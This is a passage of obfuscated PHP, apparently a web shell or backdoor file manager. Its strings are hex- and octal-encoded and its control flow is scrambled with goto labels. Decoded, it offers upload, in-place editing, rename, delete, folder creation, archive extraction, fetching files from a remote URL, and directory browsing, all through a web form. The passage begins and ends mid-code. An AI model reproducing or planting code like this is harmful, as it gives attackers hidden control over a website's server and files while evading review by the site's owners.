v9uiM: bFCor: goto d4_Jm; fwI1L: $B81_5 = $_POST["\151\x74\x65\155\x5f\143\157\156\x74\x65\x6e\x74"] ?? ''; goto Ekrpu; HMirx: I45oj: goto qySaE; uN_MD: if (!is_dir($iMsFn)) { goto h134b; } goto Gem1i; R7lg1: if (!(isset($_POST["\x61\x64\144\137\x64\151\162\x65\x63\164\157\162\171"]) && !empty($_POST["\x66\157\154\x64\145\162\x5f\x6e\x61\x6d\x65"]))) { goto YRzkH; } goto VznkB; VWIgh: echo htmlspecialchars($_SESSION["\143\x73\x72\146\137\x74\x6f\x6b\x65\156"]); goto Rw_AP; CB2Bw: QIaBt: goto YJKKG; x2fHX: $PGl9z->close(); goto s2I7D; MexCb: echo "\42\x3e\15\xa\40\x20\40\x20\40\x20\x20\x20\40\x20\40\x20\40\40\40\x20\x20\x20\40\40\x3c\x69\x6e\x70\165\x74\40\x74\171\160\x65\75\42\x66\x69\x6c\x65\42\x20\156\x61\155\145\x3d\x22\x75\160\x6c\157\141\x64\145\144\137\151\x74\x65\x6d\x22\40\x63\x6c\x61\163\x73\75\x22\x66\x6c\x65\x78\x2d\61\x20\160\55\63\40\142\x6f\x72\144\145\x72\x20\x72\x6f\x75\156\144\145\x64\x2d\x6c\147\42\40\162\145\x71\165\x69\162\x65\144\x3e\xd\12\40\x20\x20\x20\x20\40\x20\x20\40\x20\40\x20\40\40\x20\x20\40\x20\40\40\x3c\x62\165\x74\x74\157\x6e\40\x74\x79\160\x65\x3d\42\163\165\x62\155\x69\x74\x22\40\x63\154\x61\163\x73\75\42\x62\147\x2d\166\x69\166\151\144\55\164\145\141\154\40\x74\145\170\164\x2d\x77\x68\x69\x74\145\40\160\x2d\63\x20\162\157\165\x6e\x64\145\x64\55\x6c\147\40\150\x6f\x76\x65\162\72\142\x67\x2d\x76\x69\x76\x69\x64\55\x74\x65\141\x6c\55\x64\141\x72\x6b\40\x76\x69\x76\x69\144\x2d\164\x72\x61\156\x73\x69\x74\151\x6f\156\42\76\x55\160\x6c\x6f\141\x64\74\x2f\142\x75\x74\x74\157\x6e\76\xd\12\40\40\x20\40\40\40\40\40\x20\x20\x20\40\40\x20\40\x20\x3c\57\146\x6f\x72\155\x3e\15\12\x20\x20\x20\x20\40\x20\x20\x20\x20\x20\x20\40\x3c\57\144\151\166\x3e\15\xa\15\xa\x20\40\40\x20\40\x20\40\40\40\x20\40\x20\74\x21\55\55\40\106\x65\x74\x63\x68\40\122\145\155\x6f\x74\145\x20\111\x74\145\x6d\x20\55\55\x3e\xd\12\x20\40\x20\x20\40\40\40\40\40\x20\40\40"; goto ggbHY; xKzhF: if ($ucr2r) { goto Iu0FK; } goto Ug6ZC; s2I7D: $eiAOI = "\x41\162\143\150\x69\166\x65\40\145\170\164\162\x61\x63\164\145\x64\40\x73\165\143\x63\x65\163\163\x66\165\154\x6c\x79\x2e"; goto ObV33; QVrFJ: foreach ($xowh5 as $u9hBm) { goto Puhv9; hVk1D: $qZEqk[] = $u9hBm; goto MQV7z; RZs_2: y1UcO: goto NA3n4; ehzzu: rt05u: goto qimbO; Z04PA: Q3jvm: goto XRiYL; qimbO: $EFHtu = $JuXLO . "\57" . $u9hBm; goto JP2VI; eR7sj: jiDIb: goto Z04PA; Puhv9: if (!($u9hBm === "\56" || $u9hBm === "\x2e\x2e")) { goto rt05u; } goto z8da1; z8da1: goto Q3jvm; goto ehzzu; NA3n4: $TE33v[] = $u9hBm; goto eR7sj; MQV7z: goto jiDIb; goto RZs_2; JP2VI: if (is_dir($EFHtu)) { goto y1UcO; } goto hVk1D; XRiYL: } goto RR2cQ; CLrF3: FWoQf: goto SKA0p; pHwQw: H5DpE: goto LqLlA; CRH1o: if (!(isset($_POST["\165\x6e\172\151\x70\137\141\162\x63\x68\x69\x76\145"]) && !empty($_POST["\x61\162\x63\150\151\166\145\x5f\156\141\155\x65"]))) { goto F3MNV; } goto zBZq3; Iat4i: $v8gcw = 10 * 1024 * 1024; goto cqXDI; vRFPg: foreach ($qZEqk as $m1Cbo) { goto Q18zy; y0SzC: nko3w: goto gW7hL; XAopU: echo "\74\x2f\164\144\x3e\xd\xa\x20\40\x20\x20\x20\40\40\x20\x20\40\40\40\x20\x20\x20\x20\x20\40\x20\x20\40\40\x20\40\x20\40\40\40\x3c\x74\144\40\x63\x6c\x61\163\x73\75\x22\x70\55\64\42\76"; goto y5Vus; Edgn8: echo "\x20\40\40\x20\x20\x20\40\40\x20\40\x20\x20\x20\x20\x20\x20\40\40\40\40\40\40\x20\40\x20\40\40\40\x20\40\x20\40\40\40\x20\x20\x3c\x66\x6f\162\x6d\40\155\x65\164\150\157\x64\75\42\160\157\x73\164\x22\40\x63\154\x61\163\163\75\42\151\x6e\x6c\x69\x6e\x65\42\76\xd\12\x20\40\40\40\40\40\x20\40\40\40\x20\40\x20\x20\x20\40\x20\40\40\x20\x20\x20\x20\40\40\40\x20\x20\x20\x20\x20\x20\x20\x20\x20\40\x20\40\40\40\74\x69\156\160\165\x74\x20\164\171\160\x65\75\x22\150\151\144\144\145\x6e\42\x20\156\141\x6d\x65\x3d\42\x63\x73\162\x66\137\x74\x6f\153\145\x6e\x22\40\x76\x61\154\x75\x65\75\42"; goto YQb6X; jaRFx: echo "\x3c\x2f\x74\x64\x3e\15\xa\x20\x20\x20\40\x20\x20\40\x20\40\x20\x20\40\40\x20\40\x20\x20\x20\40\x20\x20\40\x20\40\x20\x20\40\40\74\x74\x64\x20\x63\x6c\x61\163\163\x3d\42\x70\x2d\x34\42\x3e"; goto pL1bZ; N4oqm: echo htmlspecialchars($m1Cbo); goto a3FdY; o_GsN: echo "\74\x2f\x74\x64\76\15\12\x20\40\x20\40\40\40\40\x20\40\x20\x20\40\x20\x20\40\x20\x20\x20\x20\x20\40\x20\40\40\x20\x20\40\x20\74\164\144\40\143\x6c\x61\163\x73\x3d\42\x70\x2d\x34\x22\76"; goto zOp5S; YQb6X: echo htmlspecialchars($_SESSION["\143\163\x72\146\x5f\x74\x6f\153\145\x6e"]); goto O74Wv; zC_Rs: echo htmlspecialchars($m1Cbo); goto XAopU; i_O9C: if (!(pathinfo($m1Cbo, PATHINFO_EXTENSION) === "\172\151\x70")) { goto OIAeA; } goto Edgn8; iDtHe: echo "\x3c\x2f\164\x64\x3e\xd\12\40\40\40\x20\40\x20\40\x20\x20\40\x20\x20\x20\40\x20\40\40\40\40\40\40\40\40\x20\40\40\x20\x20\x3c\164\x64\x20\143\x6c\x61\x73\163\75\x22\x70\x2d\64\x22\76"; goto RpmSq; oJE_t: echo htmlspecialchars($m1Cbo); goto zCGOq; MZpj0: echo "\x20\x20\40\40\x20\x20\x20\40\x20\x20\x20\x20\x20\40\x20\x20\40\40\x20\x20\x20\x20\x20\40\40\40\x20\x20\x3c\57\x74\144\76\15\12\x20\x20\x20\x20\x20\x20\x20\x20\40\40\x20\x20\x20\x20\40\x20\40\x20\x20\x20\x20\40\40\x20\74\57\x74\162\76\15\12\x20\x20\40\x20\40\40\40\40\40\40\x20\40\x20\40\40\x20\x20\40\x20\40"; goto y0SzC; tmQFz: echo htmlspecialchars($m1Cbo); goto RuO0S; pL1bZ: echo is_writable($JuXLO . "\57" . $m1Cbo) ? "\131\x65\163" : "\116\x6f"; goto iDtHe; Q18zy: echo "\40\40\x20\40\40\x20\40\x20\x20\40\x20\x20\40\x20\x20\40\x20\40\40\x20\40\x20\x20\x20\x3c\164\x72\40\x63\154\141\163\x73\x3d\x22\x62\157\x72\144\145\162\x2d\164\x20\150\x6f\166\x65\x72\x3a\x62\147\x2d\x67\162\141\x79\x2d\x35\60\40\x76\151\166\151\144\55\164\x72\141\x6e\x73\x69\x74\x69\157\x6e\42\76\xd\xa\x20\40\x20\40\x20\40\40\x20\x20\x20\x20\40\x20\x20\40\40\x20\x20\x20\40\40\40\x20\x20\x20\40\x20\x20\74\164\x64\x20\143\154\x61\x73\163\x3d\42\160\x2d\64\42\x3e\x3c\151\40\143\154\141\x73\x73\x3d\x22\x66\x61\x73\x20\146\x61\55\x66\x69\154\x65\40\x6d\162\x2d\62\x20\164\x65\x78\164\x2d\x76\x69\x76\151\144\x2d\x74\145\141\154\42\76\74\x2f\151\76"; goto zC_Rs; a3FdY: echo "\x22\76\xd\12\x20\40\40\x20\40\x20\x20\40\40\40\x20\40\x20\x20\x20\40\x20\x20\40\x20\x20\40\40\x20\40\40\40\40\40\x20\x20\x20\x20\x20\40\x20\40\x20\40\x20\x3c\142\x75\x74\164\157\156\x20\x74\x79\160\x65\75\42\x73\165\142\155\x69\164\42\40\156\141\155\145\x3d\42\165\x6e\x7a\x69\x70\137\x61\x72\143\x68\151\x76\x65\42\40\x63\x6c\x61\163\x73\75\42\x62\x67\55\147\x72\145\x65\156\55\65\60\x30\x20\x74\145\170\164\x2d\x77\150\151\164\145\x20\x70\170\x2d\x33\40\x70\x79\55\61\40\162\157\165\x6e\x64\145\x64\55\154\x67\40\150\x6f\166\x65\x72\72\142\x67\x2d\x67\162\145\145\156\55\66\x30\60\40\166\x69\x76\x69\x64\x2d\x74\x72\141\156\163\x69\164\151\x6f\x6e\42\76\74\x69\40\x63\x6c\141\163\x73\x3d\x22\146\x61\163\x20\146\x61\55\x66\x69\154\145\x2d\141\162\143\150\x69\166\145\40\155\162\55\x31\x22\76\74\57\151\76\x55\156\172\151\x70\74\x2f\142\x75\x74\164\x6f\156\x3e\15\xa\40\x20\x20\40\x20\40\40\x20\40\x20\40\x20\x20\40\x20\x20\40\x20\x20\x20\40\x20\x20\x20\40\40\x20\x20\40\x20\40\x20\x20\x20\x20\40\x3c\x2f\146\157\x72\x6d\76\15\12\40\40\x20\x20\x20\x20\40\40\40\x20\40\40\x20\x20\x20\40\40\x20\x20\40\x20\x20\40\40\x20\40\40\x20\x20\40\x20\x20"; goto xkMK4; zOp5S: echo XJQI2(filesize($JuXLO . "\57" . $m1Cbo)); goto jaRFx; F2LHM: echo "\47\51\42\x20\x63\154\141\163\163\75\42\142\x67\55\171\145\154\154\x6f\167\55\65\x30\60\40\164\145\x78\x74\55\167\x68\x69\164\x65\x20\160\170\55\63\40\x70\171\x2d\x31\x20\162\x6f\x75\x6e\144\x65\144\55\x6c\x67\40\150\157\166\145\162\72\142\x67\55\x79\x65\154\154\157\167\55\66\60\x30\40\x76\x69\x76\151\x64\x2d\x74\x72\141\x6e\x73\x69\x74\x69\x6f\156\x22\76\122\145\156\x61\x6d\145\74\57\142\x75\x74\x74\x6f\x6e\x3e\xd\xa\x20\40\40\40\x20\x20\x20\40\x20\x20\x20\x20\40\40\40\x20\40\40\40\x20\x20\40\40\x20\x20\x20\x20\40\40\x20\40\40\74\x62\165\x74\164\x6f\156\x20\157\x6e\x63\154\151\143\x6b\x3d\42\143\157\156\x66\151\162\x6d\x44\145\x6c\145\x74\145\50\x27"; goto oJE_t; zCGOq: echo "\47\51\x22\x20\143\154\141\x73\x73\x3d\x22\x62\x67\55\162\145\x64\55\65\60\60\x20\164\x65\170\x74\55\x77\150\x69\x74\x65\x20\x70\170\55\63\x20\160\171\x2d\x31\40\162\x6f\165\156\x64\x65\x64\x2d\x6c\147\x20\150\157\x76\145\162\x3a\142\x67\55\x72\145\x64\55\66\x30\60\40\x76\151\166\151\144\55\x74\162\141\x6e\x73\151\x74\x69\157\156\42\x3e\x44\145\154\x65\164\145\x3c\57\142\165\164\x74\157\156\76\xd\12\x20\x20\x20\40\40\40\x20\x20\x20\40\40\x20\40\x20\40\x20\40\40\x20\x20\x20\x20\40\x20\40\40\40\x20\x20\x20\40\40"; goto i_O9C; O74Wv: echo "\42\x3e\15\12\x20\x20\40\40\x20\40\x20\40\40\x20\x20\x20\x20\x20\x20\x20\x20\x20\40\40\40\40\x20\40\40\40\x20\40\x20\40\40\x20\40\40\40\40\40\40\40\40\x3c\x69\156\160\165\x74\40\x74\171\x70\x65\x3d\42\x68\x69\x64\x64\145\156\x22\x20\x6e\x61\x6d\x65\x3d\42\141\162\x63\x68\x69\166\145\x5f\156\x61\x6d\145\42\40\x76\141\154\x75\x65\75\42"; goto N4oqm; wAw_D: echo "\74\x2f\164\x64\76\xd\12\x20\x20\40\40\x20\40\40\40\40\x20\40\x20\x20\x20\x20\x20\x20\40\x20\x20\40\40\x20\40\40\x20\x20\x20\74\164\144\x20\143\x6c\141\163\x73\x3d\x22\160\55\x34\40\163\160\x61\x63\x65\55\x78\55\x33\42\76\xd\xa\40\40\x20\40\x20\40\40\40\x20\x20\40\x20\40\x20\40\40\x20\40\x20\40\40\x20\40\40\40\40\40\x20\x20\40\40\x20\x3c\x62\x75\164\x74\x6f\x6e\x20\x6f\156\143\154\151\143\153\75\x22\x65\x64\x69\164\111\x74\x65\x6d\50\47"; goto tmQFz; y5Vus: echo strtoupper(pathinfo($m1Cbo, PATHINFO_EXTENSION)); goto o_GsN; eXWWg: echo htmlspecialchars($m1Cbo); goto F2LHM; RuO0S: echo "\47\51\42\x20\143\154\141\x73\163\75\x22\x62\x67\x2d\x76\151\166\x69\x64\55\x74\145\x61\154\40\x74\145\x78\x74\55\167\150\x69\x74\x65\x20\x70\x78\55\x33\x20\160\171\55\x31\x20\162\x6f\x75\x6e\144\145\x64\x2d\154\x67\x20\150\157\x76\145\162\72\x62\x67\55\166\151\x76\151\144\55\164\145\141\x6c\55\144\141\x72\x6b\x20\x76\x69\166\x69\144\x2d\x74\x72\x61\x6e\163\151\164\x69\x6f\156\42\76\105\x64\x69\164\x3c\57\142\x75\x74\x74\157\156\76\xd\12\x20\40\x20\x20\40\40\x20\x20\x20\40\x20\x20\40\40\40\40\x20\x20\40\x20\40\x20\40\40\40\40\40\x20\40\x20\40\x20\74\142\165\x74\164\x6f\156\40\x6f\x6e\x63\154\151\143\x6b\75\x22\x6f\160\145\156\122\145\156\x61\x6d\145\x44\151\x61\x6c\157\x67\x28\47"; goto eXWWg; RpmSq: echo date("\131\55\x6d\55\x64\40\110\x3a\x69\72\163", filemtime($JuXLO . "\x2f" . $m1Cbo)); goto wAw_D; xkMK4: OIAeA: goto MZpj0; gW7hL: } goto pHyYb; NT8I4: sxegx: goto x2fHX; scsPE: $VRFha = true; goto cV0IM; C85NG: KF6Ic: goto FZh6n; hp08D: $EFHtu = $JuXLO . "\57" . $w529N; goto YWse4; pTgl7: goto bCxUI; goto dEEte; Y70El: echo "\40\x20\x20\40\40\x20\x20\40\40\40\40\40\40\40\40\40\40\x20\x20\x20\40\40\40\x20\74\x74\x72\x20\x63\154\x61\163\x73\x3d\42\x62\157\x72\x64\x65\162\55\x74\40\x68\x6f\x76\x65\x72\72\142\147\55\x67\162\x61\171\x2d\65\x30\40\166\x69\x76\151\144\x2d\164\x72\x61\x6e\x73\x69\164\151\157\156\42\x3e\xd\12\40\40\40\40\x20\40\40\x20\x20\x20\x20\40\x20\40\40\40\40\x20\x20\x20\40\x20\x20\40\40\40\x20\40\x3c\164\144\40\x63\154\x61\163\x73\75\x22\x70\x2d\x34\x22\76\x3c\151\40\143\154\x61\x73\x73\75\42\146\x61\163\40\x66\x61\x2d\x66\157\x6c\x64\x65\162\40\x6d\x72\x2d\x32\x20\x74\x65\170\164\x2d\x76\151\x76\151\x64\55\x74\x65\x61\x6c\42\x3e\x3c\x2f\x69\76\74\141\40\x68\x72\145\146\75\42\77\167\x6f\x72\153\x73\x70\x61\x63\145\75"; goto VjJe6; B8Ar7: if (file_exists($gCExE) && !file_exists($c8hfI)) { goto y4Wmh; } goto lTLNh; rbr53: EIXzS: goto zFl2w; Q2fhm: $eiAOI = "\105\162\162\x6f\162\x20\x72\145\156\141\155\151\156\x67\40\151\164\145\155\x2e"; goto TdqNo; g6eNo: $rdZLi = Z2HHU($_POST["\x6e\x65\167\137\156\x61\x6d\145"]); goto QZ0tN; Rw_AP: echo "\42\x3e\xd\12\x20\40\40\x20\x20\40\x20\x20\40\x20\40\x20\x20\40\40\x20\x3c\x69\x6e\x70\165\x74\40\x74\x79\x70\145\75\x22\150\151\144\x64\x65\x6e\x22\x20\151\x64\x3d\42\145\x64\151\x74\x49\164\x65\x6d\116\141\x6d\x65\x22\x20\156\x61\155\145\75\x22\151\x74\145\x6d\137\x6e\141\155\x65\x22\76\xd\12\x20\40\40\40\40\x20\40\40\40\40\40\40\40\40\x20\x20\x3c\164\x65\170\164\x61\162\x65\x61\40\x69\144\x3d\x22\145\x64\151\x74\111\164\x65\x6d\103\157\156\x74\145\156\164\42\x20\x6e\141\x6d\145\x3d\x22\151\164\145\155\137\143\157\156\164\145\156\x74\x22\x20\x63\x6c\x61\163\163\x3d\42\x77\x2d\x66\x75\x6c\x6c\x20\x68\55\70\60\40\x70\x2d\x33\x20\142\157\x72\x64\x65\x72\x20\162\157\165\x6e\x64\145\x64\x2d\x6c\x67\40\x6d\142\55\66\40\x66\x6f\143\x75\x73\x3a\157\165\x74\x6c\x69\156\145\x2d\x6e\x6f\156\145\40\x66\157\x63\165\163\x3a\162\x69\x6e\x67\55\62\40\146\x6f\x63\x75\x73\x3a\162\151\x6e\x67\55\166\151\x76\151\x64\x2d\164\145\141\154\42\x3e\x3c\x2f\x74\x65\x78\164\x61\x72\x65\x61\76\15\xa\x20\x20\40\x20\40\40\x20\x20\40\40\40\x20\40\x20\x20\40\74\144\x69\x76\40\x63\154\x61\x73\163\75\x22\x66\x6c\x65\x78\x20\152\165\x73\164\x69\x66\x79\55\x65\x6e\144\40\x73\x70\141\x63\x65\x2d\170\55\63\x22\76\15\xa\x20\x20\x20\x20\40\x20\x20\40\x20\x20\x20\40\x20\40\40\40\x20\40\x20\x20\74\142\x75\x74\x74\x6f\x6e\40\164\171\x70\145\75\42\163\x75\142\155\151\164\42\40\156\x61\155\x65\x3d\42\155\157\x64\x69\146\x79\x5f\146\x69\x6c\145\x22\x20\143\154\x61\x73\x73\x3d\42\x62\x67\x2d\x67\162\x65\x65\156\x2d\65\x30\60\40\x74\145\x78\164\x2d\x77\x68\151\164\145\x20\x70\170\x2d\65\40\160\x79\55\x32\40\162\x6f\165\156\x64\145\x64\x2d\154\x67\40\x68\157\x76\145\162\x3a\142\x67\55\x67\162\145\145\156\55\66\60\x30\x20\166\151\x76\151\144\x2d\164\162\141\156\x73\151\164\x69\157\x6e\42\x3e\x53\141\166\x65\x3c\x2f\x62\165\164\x74\157\x6e\x3e\15\xa\40\40\40\x20\40\40\x20\40\x20\x20\40\40\x20\40\40\x20\x20\x20\40\x20\x3c\142\165\x74\x74\157\x6e\x20\164\171\x70\145\75\42\142\165\164\x74\x6f\156\42\40\x6f\156\x63\x6c\x69\x63\x6b\x3d\42\143\x6c\157\163\x65\x44\151\141\x6c\x6f\x67\50\x27\x65\x64\151\164\x44\151\x61\x6c\157\x67\47\51\x22\40\x63\154\x61\x73\x73\75\42\142\147\55\x67\x72\x61\171\55\65\x30\60\40\x74\145\x78\x74\55\167\150\x69\164\145\40\x70\x78\x2d\x35\40\x70\x79\55\62\x20\x72\157\x75\156\x64\x65\x64\55\x6c\x67\40\150\157\x76\145\162\72\x62\x67\x2d\x67\162\141\x79\x2d\x36\x30\x30\40\x76\x69\166\151\x64\x2d\164\x72\x61\156\x73\151\x74\151\x6f\x6e\42\x3e\103\x61\156\143\145\x6c\74\x2f\142\165\164\164\x6f\x6e\x3e\xd\12\x20\x20\40\40\40\x20\40\40\x20\40\40\x20\40\40\40\x20\74\57\x64\151\x76\76\15\xa\40\40\40\40\x20\x20\x20\x20\40\40\x20\x20\74\57\x66\x6f\162\x6d\76\xd\12\x20\x20\x20\x20\x20\x20\40\x20\74\x2f\144\x69\x76\76\xd\12\40\x20\40\40\x3c\57\144\x69\166\76\15\12\15\xa\40\x20\x20\40\74\x21\55\x2d\x20\122\145\x6e\141\x6d\x65\40\104\x69\141\154\157\147\x20\55\55\x3e\15\xa\40\x20\40\40\74\x64\x69\166\x20\151\144\75\x22\162\145\156\141\x6d\x65\x44\151\x61\154\157\147\x22\40\143\x6c\x61\x73\x73\x3d\x22\146\151\170\145\x64\x20\x69\x6e\163\145\x74\x2d\60\40\142\x67\55\147\x72\141\x79\x2d\x36\x30\60\x20\x62\147\x2d\157\160\141\x63\x69\164\171\x2d\x35\60\40\x68\x69\144\144\145\156\40\151\x74\145\155\x73\55\143\145\x6e\164\x65\x72\40\152\x75\163\x74\x69\x66\x79\x2d\143\145\x6e\x74\145\x72\x20\x76\151\166\151\x64\55\x74\x72\x61\x6e\x73\x69\x74\x69\x6f\x6e\42\76\15\12\40\40\x20\40\x20\40\x20\40\74\x64\x69\166\40\x63\154\x61\x73\163\75\42\142\x67\55\167\150\x69\x74\x65\x20\160\55\x38\40\x72\157\165\156\144\x65\x64\55\170\x6c\x20\163\x68\x61\144\157\x77\55\170\x6c\40\x77\x2d\146\x75\x6c\x6c\40\x6d\x61\x78\55\167\x2d\x6d\x64\40\164\x72\141\x6e\x73\x66\157\x72\155\40\163\x63\141\x6c\x65\x2d\71\65\x20\x76\151\x76\151\144\55\164\x72\x61\156\x73\x69\164\x69\157\x6e\42\x3e\15\12\40\x20\x20\x20\40\x20\40\40\40\40\x20\x20\x3c\150\62\40\x63\x6c\x61\163\x73\x3d\42\x74\145\x78\x74\x2d\62\x78\154\x20\146\x6f\156\164\x2d\x62\x6f\x6c\x64\40\x6d\142\55\x36\x20\164\x65\x78\164\55\166\x69\166\x69\x64\55\143\150\x61\x72\143\x6f\141\x6c\42\76\x52\x65\156\x61\x6d\145\x20\x49\164\x65\155\x3c\x2f\150\x32\x3e\15\xa\x20\40\x20\40\x20\40\x20\40\40\40\x20\x20\x3c\x66\x6f\x72\x6d\x20\151\144\75\x22\x72\145\x6e\141\x6d\x65\106\x6f\162\x6d\x22\x20\155\x65\x74\x68\x6f\x64\75\42\160\x6f\x73\x74\42\x3e\xd\xa\x20\x20\x20\x20\40\40\40\40\40\40\40\x20\x20\x20\40\40\74\x69\156\160\x75\164\40\164\171\160\145\75\x22\x68\151\144\x64\145\156\42\40\156\x61\155\145\x3d\42\x63\x73\x72\x66\137\x74\x6f\x6b\145\156\42\x20\166\141\154\x75\x65\75\x22"; goto vHRRX; wd0O1: lSfsZ: goto t6zNC; YWse4: if (file_exists($EFHtu)) { goto uxbHB; } goto uJGlp; VjJe6: echo urlencode(dirname($JuXLO)); goto Azqj4; D9tDx: echo "\x22\x3e\15\xa\x20\40\40\x20\40\x20\40\x20\x20\x20\40\40\40\x20\40\40\x20\x20\x20\40\x20\x20\x20\x20\74\151\156\x70\x75\164\40\164\171\x70\145\x3d\42\x75\162\x6c\x22\40\x6e\141\155\145\x3d\42\162\x65\155\x6f\x74\145\137\x75\x72\x6c\42\x20\143\154\141\x73\163\75\42\x66\154\x65\170\55\x31\40\160\55\63\40\x62\157\162\144\145\162\40\162\157\165\156\x64\145\x64\x2d\x6c\147\40\x66\x6f\x63\x75\x73\72\x6f\x75\x74\x6c\x69\x6e\x65\x2d\x6e\157\156\145\40\x66\157\x63\x75\x73\x3a\162\151\156\x67\x2d\x32\40\146\x6f\143\165\x73\72\x72\x69\x6e\147\x2d\166\x69\166\151\x64\x2d\164\x65\x61\154\42\40\x70\x6c\141\143\145\150\157\154\144\x65\x72\x3d\x22\150\x74\164\160\x73\72\x2f\57\145\170\x61\155\160\154\145\x2e\143\157\x6d\57\151\164\145\x6d\56\172\151\160\x22\x20\162\x65\x71\x75\x69\x72\x65\144\76\xd\xa\40\x20\40\40\x20\x20\x20\40\40\x20\40\40\x20\40\40\x20\40\x20\x20\40\40\40\40\x20\x3c\142\x75\164\164\157\156\40\164\x79\x70\x65\75\42\163\165\142\155\x69\x74\42\x20\x6e\141\155\x65\75\42\x66\x65\x74\x63\150\x5f\162\145\x6d\157\x74\145\x22\40\x63\x6c\x61\163\163\75\x22\x62\147\x2d\x76\x69\166\151\144\55\164\x65\x61\x6c\40\x74\x65\x78\x74\55\167\x68\x69\164\145\40\160\55\63\40\162\x6f\165\x6e\144\145\x64\x2d\x6c\147\x20\150\157\x76\x65\162\x3a\142\x67\x2d\x76\x69\166\x69\x64\55\164\x65\x61\154\x2d\144\x61\162\x6b\x20\x76\x69\x76\x69\144\x2d\164\x72\x61\x6e\x73\x69\x74\x69\157\x6e\42\76\106\145\x74\x63\150\74\57\x62\165\164\x74\x6f\156\76\15\12\x20\x20\40\40\40\x20\40\40\x20\x20\40\40\40\40\40\x20\x20\x20\x20\x20\74\57\x66\157\x72\x6d\76\15\12\x20\40\x20\x20\40\x20\40\40\40\40\x20\x20\40\x20\x20\x20\74\x2f\144\151\166\76\15\xa\40\40\x20\40\x20\x20\40\40\x20\40\x20\x20"; goto R31Bk; Rybv9: if (!file_exists($dmR7a)) { goto BGEfe; } goto yB39h; YNJtF: goto CEB0D; goto OMTJJ; uCaEY: echo "\42\76\15\xa\x20\40\x20\40\40\x20\x20\40\40\x20\x20\40\x20\x20\40\x20\40\x20\40\40\x3c\x69\156\160\x75\x74\x20\x74\x79\160\145\x3d\42\150\151\144\x64\x65\x6e\x22\40\x6e\141\155\145\x3d\x22\151\x74\x65\155\x5f\x6e\141\x6d\x65\42\x20\x76\x61\x6c\165\x65\75\42\x24\x7b\x69\x74\145\155\x4e\x61\155\145\175\x22\x3e\15\xa\x20\40\40\x20\40\x20\x20\x20\x20\x20\x20\40\40\40\40\40\40\40\x20\x20\x3c\151\x6e\160\x75\x74\x20\164\x79\160\x65\x3d\x22\150\151\x64\x64\x65\156\42\40\156\x61\155\145\75\42\144\x65\x6c\x65\x74\145\137\x69\x74\x65\x6d\x22\x20\166\x61\x6c\165\145\75\x22\x31\42\x3e\xd\12\x20\x20\x20\x20\x20\x20\40\x20\40\40\x20\x20\x20\40\40\x20\x60\x3b\xd\xa\x20\40\40\40\40\40\x20\40\x20\40\40\40\40\40\40\40\144\157\143\x75\155\145\156\x74\56\142\x6f\144\171\56\x61\x70\x70\145\156\144\103\x68\151\154\144\50\146\x6f\162\155\x29\73\xd\12\x20\40\40\40\40\40\x20\x20\x20\x20\40\40\40\40\x20\40\x66\x6f\x72\x6d\56\163\x75\142\155\x69\164\50\x29\x3b\15\12\x20\40\40\40\x20\x20\40\x20\x20\40\x20\40\x7d\xd\12\x20\x20\40\40\40\40\x20\40\x7d\15\xa\15\12\x20\x20\40\x20\40\40\x20\x20\146\x75\x6e\x63\x74\x69\157\x6e\40\x6f\x70\x65\x6e\104\151\x61\x6c\157\147\50\144\x69\x61\x6c\x6f\147\111\144\x29\40\x7b\15\xa\x20\40\x20\x20\40\40\x20\x20\x20\40\x20\40\x63\157\x6e\x73\x74\40\x64\x69\x61\x6c\157\147\x20\75\x20\x64\157\x63\165\155\x65\156\x74\x2e\147\x65\164\105\154\145\x6d\145\x6e\164\x42\x79\111\x64\x28\144\x69\141\154\157\x67\111\x64\51\x3b\15\12\40\x20\40\40\x20\x20\x20\40\40\40\40\x20\144\151\141\x6c\x6f\x67\56\143\154\141\x73\163\x4c\x69\163\x74\56\162\145\x6d\x6f\166\x65\50\47\x68\151\x64\144\x65\156\47\x29\73\15\12\40\x20\x20\x20\40\x20\40\x20\40\40\40\x20\144\151\141\x6c\x6f\x67\x2e\x63\154\x61\x73\x73\114\x69\x73\x74\56\x61\144\144\x28\x27\146\154\x65\170\x27\x29\73\15\xa\40\x20\40\40\40\40\40\40\x20\40\40\40\163\x65\164\x54\151\155\x65\x6f\x75\164\50\x28\x29\40\x3d\76\40\173\15\12\40\x20\40\x20\x20\x20\40\40\x20\x20\x20\x20\40\x20\x20\x20\144\x69\x61\x6c\x6f\x67\56\x71\165\145\x72\x79\x53\x65\154\x65\143\x74\x6f\x72\x28\x27\56\164\x72\141\x6e\163\146\157\x72\155\47\x29\56\x63\154\141\163\163\x4c\151\x73\164\x2e\162\145\155\157\166\x65\x28\47\163\143\141\x6c\x65\55\71\x35\x27\x29\73\xd\12\x20\x20\40\x20\40\40\40\x20\40\x20\x20\40\175\54\x20\x31\x30\51\73\xd\xa\40\40\x20\40\40\40\x20\x20\175\xd\xa\15\12\x20\40\x20\40\x20\x20\x20\x20\x66\165\x6e\x63\x74\151\x6f\x6e\x20\143\x6c\157\x73\145\104\151\141\x6c\157\147\50\x64\151\x61\154\157\147\x49\144\x29\40\173\15\xa\40\40\40\x20\x20\40\40\x20\40\x20\x20\x20\143\x6f\x6e\163\x74\x20\144\x69\141\154\157\x67\40\x3d\40\144\x6f\143\165\x6d\145\156\164\56\147\145\164\105\x6c\x65\x6d\145\156\164\102\x79\x49\144\x28\x64\151\141\154\157\147\x49\144\x29\73\15\xa\40\40\40\40\40\x20\x20\40\x20\40\x20\40\144\151\x61\x6c\157\147\x2e\161\165\x65\162\x79\x53\145\x6c\145\x63\x74\157\162\50\x27\x2e\164\162\141\x6e\163\146\157\x72\x6d\47\x29\x2e\143\x6c\x61\163\x73\114\151\163\x74\x2e\141\x64\144\x28\x27\163\143\x61\154\145\55\71\65\47\51\73\15\xa\x20\40\x20\40\40\40\x20\40\40\x20\x20\40\163\145\164\x54\x69\x6d\145\157\165\164\50\50\51\40\x3d\76\40\173\xd\12\40\x20\x20\x20\40\x20\x20\40\x20\40\40\x20\x20\x20\x20\40\144\151\141\154\157\x67\56\143\154\141\x73\x73\x4c\151\163\x74\56\141\144\144\50\x27\150\x69\144\144\145\156\47\51\73\15\xa\x20\x20\x20\40\x20\40\x20\x20\40\x20\40\x20\40\x20\x20\40\144\151\141\154\157\x67\56\x63\x6c\x61\163\163\114\x69\x73\x74\56\162\145\155\x6f\166\x65\50\x27\x66\x6c\x65\x78\47\x29\x3b\xd\12\40\x20\x20\40\40\40\40\40\x20\x20\40\x20\175\x2c\x20\63\x30\60\51\x3b\15\xa\x20\x20\40\40\40\x20\x20\40\175\xd\12\15\12\40\40\40\40\40\x20\40\40\57\57\x20\103\154\x69\x65\x6e\164\x2d\x73\x69\144\14